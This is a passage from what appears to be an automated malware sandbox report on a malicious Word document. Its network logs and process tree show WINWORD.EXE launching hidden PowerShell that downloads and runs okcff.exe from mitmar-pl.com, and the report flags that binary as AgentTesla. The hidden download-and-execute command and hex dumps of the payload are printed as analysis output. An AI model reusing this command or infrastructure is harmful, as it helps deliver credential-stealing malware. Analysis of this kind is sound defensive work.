Jan 14, 2022 10:23:17.920835972 CET | 192.168.2.22 | 8.8.8.8 | 0xf90 | Standard query (0) | mitmar-pl.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:22.426112890 CET | 192.168.2.22 | 8.8.8.8 | 0x8b50 | Standard query (0) | mitmar-pl.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:23.372718096 CET | 192.168.2.22 | 8.8.8.8 | 0x8fde | Standard query (0) | mitmar-pl.com | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:26.991931915 CET | 192.168.2.22 | 8.8.8.8 | 0x11d5 | Standard query (0) | mitmar-pl.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 10:23:17.952476025 CET | 8.8.8.8 | 192.168.2.22 | 0xf90 | No error (0) | mitmar-pl.com |  | 37.0.9.166 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:22.446824074 CET | 8.8.8.8 | 192.168.2.22 | 0x8b50 | No error (0) | mitmar-pl.com |  | 37.0.9.166 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:23.440036058 CET | 8.8.8.8 | 192.168.2.22 | 0x8fde | No error (0) | mitmar-pl.com |  | 37.0.9.166 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:23:27.011117935 CET | 8.8.8.8 | 192.168.2.22 | 0x11d5 | No error (0) | mitmar-pl.com |  | 37.0.9.166 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• mitmar-pl.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 37.0.9.166 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 10:23:17.996404886 CET | 0 | OUT | GET /okcff.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: mitmar-pl.com
Connection: Keep-Alive
Jan 14, 2022 10:23:18.024344921 CET | 2 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Jan 2022 09:23:18 GMT
Content-Type: application/x-msdownload
Content-Length: 194560
Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
Connection: keep-alive
ETag: "61e11090-2f800"
Accept-Ranges: bytes
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 
02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28 17 00 00 06 28 05 00 00 0a 13 2a 20 01 00 00 00 7e 68 00 00 04 39 98 ff ff ff 26 20 01 00 00 00 38 8d ff ff ff 11 2f 28 16 00 00 06 74 04 00 00 01 13 17 38 bf ff ff ff 28 18 00 00 06 11 2a 28 12 00 00 06 13 19 20 00 00 00 00 7e 0d 00 00 04 39 5d ff ff ff 26 20 00 00 00 00 38 52 ff ff ff dd 03 03 00 00 11 2f 75 14 00 00 01 13 1a 38 16 00 00 00 fe 0c 0f 00 45 02 00 00 00 32 00 00 00 26 00 00 00 38 2d 00 00 00 11 1a 3a 1a 00 00 00 20 00 00 00 00 7e 50 00 00 04 3a d8 ff ff ff 26 20 00 00 00 00 38 cd ff ff ff 11 1a 6f
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY0TNs @ @@sKX H.textTS T `.rsrcXV@@.reloc @B0sHB/Hr0rp((((*0Q $8$ESc^7>2([m88M ~_:& 8(Eq^8io8/(:8 8,((* ~h9& 8/(t8(*( ~9]& 8R/u8E2&8-: ~P:& 8o


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 37.0.9.166 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 10:23:22.518182993 CET | 206 | OUT | GET /okcff.exe HTTP/1.1
Host: mitmar-pl.com
Connection: Keep-Alive
Jan 14, 2022 10:23:22.545969963 CET | 207 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Jan 2022 09:23:22 GMT
Content-Type: application/x-msdownload
Content-Length: 194560
Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
Connection: keep-alive
ETag: "61e11090-2f800"
Accept-Ranges: bytes
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 
02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28 17 00 00 06 28 05 00 00 0a 13 2a 20 01 00 00 00 7e 68 00 00 04 39 98 ff ff ff 26 20 01 00 00 00 38 8d ff ff ff 11 2f 28 16 00 00 06 74 04 00 00 01 13 17 38 bf ff ff ff 28 18 00 00 06 11 2a 28 12 00 00 06 13 19 20 00 00 00 00 7e 0d 00 00 04 39 5d ff ff ff 26 20 00 00 00 00 38 52 ff ff ff dd 03 03 00 00 11 2f 75 14 00 00 01 13 1a 38 16 00 00 00 fe 0c 0f 00 45 02 00 00 00 32 00 00 00 26 00 00 00 38 2d 00 00 00 11 1a 3a 1a 00 00 00 20 00 00 00 00 7e 50 00 00 04 3a d8 ff ff ff 26 20 00 00 00 00 38 cd ff ff ff 11 1a 6f
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY0TNs @ @@sKX H.textTS T `.rsrcXV@@.reloc @B0sHB/Hr0rp((((*0Q $8$ESc^7>2([m88M ~_:& 8(Eq^8io8/(:8 8,((* ~h9& 8/(t8(*( ~9]& 8R/u8E2&8-: ~P:& 8o


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 37.0.9.166 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Jan 14, 2022 10:23:23.479233027 CET | 408 | OUT | GET /okcff.exe HTTP/1.1
Host: mitmar-pl.com
Connection: Keep-Alive
Jan 14, 2022 10:23:23.507251978 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Jan 2022 09:23:23 GMT
Content-Type: application/x-msdownload
Content-Length: 194560
Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
Connection: keep-alive
ETag: "61e11090-2f800"
Accept-Ranges: bytes


                                                          Session ID:3
                                                          Source IP:192.168.2.22
                                                          Source Port:49170
                                                          Destination IP:37.0.9.166
                                                          Destination Port:80
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                                                          Timestamp:Jan 14, 2022 10:23:27.105874062 CET
                                                          kBytes transferred:612
                                                          Direction:OUT
                                                          Data:GET /Crkrqdrd.jpeg HTTP/1.1
                                                          Host: mitmar-pl.com
                                                          Connection: Keep-Alive
                                                          Timestamp:Jan 14, 2022 10:23:27.134126902 CET
                                                          kBytes transferred:614
                                                          Direction:IN
                                                          Data:HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 14 Jan 2022 09:23:27 GMT
                                                          Content-Type: image/jpeg
                                                          Content-Length: 519680
                                                          Last-Modified: Fri, 14 Jan 2022 05:40:37 GMT
                                                          Connection: keep-alive
                                                          ETag: "61e10cd5-7ee00"
                                                          Accept-Ranges: bytes


                                                          Code Manipulations

                                                          Statistics

                                                          Behavior


                                                          System Behavior

                                                          General

                                                          Start time:10:22:23
                                                          Start date:14/01/2022
                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                          Imagebase:0x13f6b0000
                                                          File size:1423704 bytes
                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:27
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.436663453.0000000000380000.00000004.00000020.sdmp, Author: Florian Roth
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:29
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp, Author: Florian Roth
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:29
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                                                          Imagebase:0x13f9e0000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:34
                                                          Start date:14/01/2022
                                                          Path:C:\Users\user\AppData\Roaming\okcff.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\okcff.exe"
                                                          Imagebase:0x9f0000
                                                          File size:194560 bytes
                                                          MD5 hash:E9416A322E9A796D45588BC4FB04CD45
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.623662053.000000000356F000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621443805.00000000023AD000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.621033509.0000000001E30000.00000004.00020000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low

                                                          General

                                                          Start time:10:22:37
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a190000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:37
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x9f0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:22:41
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a6d0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:10:22:42
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x2e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:22:44
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a270000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:45
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x6e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:47
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a030000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:48
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\verclsid.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                                          Imagebase:0xff0a0000
                                                          File size:11776 bytes
                                                          MD5 hash:3796AE13F680D9239210513EDA590E86
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:48
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xf0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:50
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                          Imagebase:0xff910000
                                                          File size:193536 bytes
                                                          MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:51
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a7b0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:52
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x6b0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:54
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a2a0000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:55
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0x4e0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:22:59
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4ac50000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:23:00
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xae0000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:23:04
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a970000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:23:05
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout 2
                                                          Imagebase:0xe80000
                                                          File size:27136 bytes
                                                          MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:23:09
                                                          Start date:14/01/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C timeout 2
                                                          Imagebase:0x4a700000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

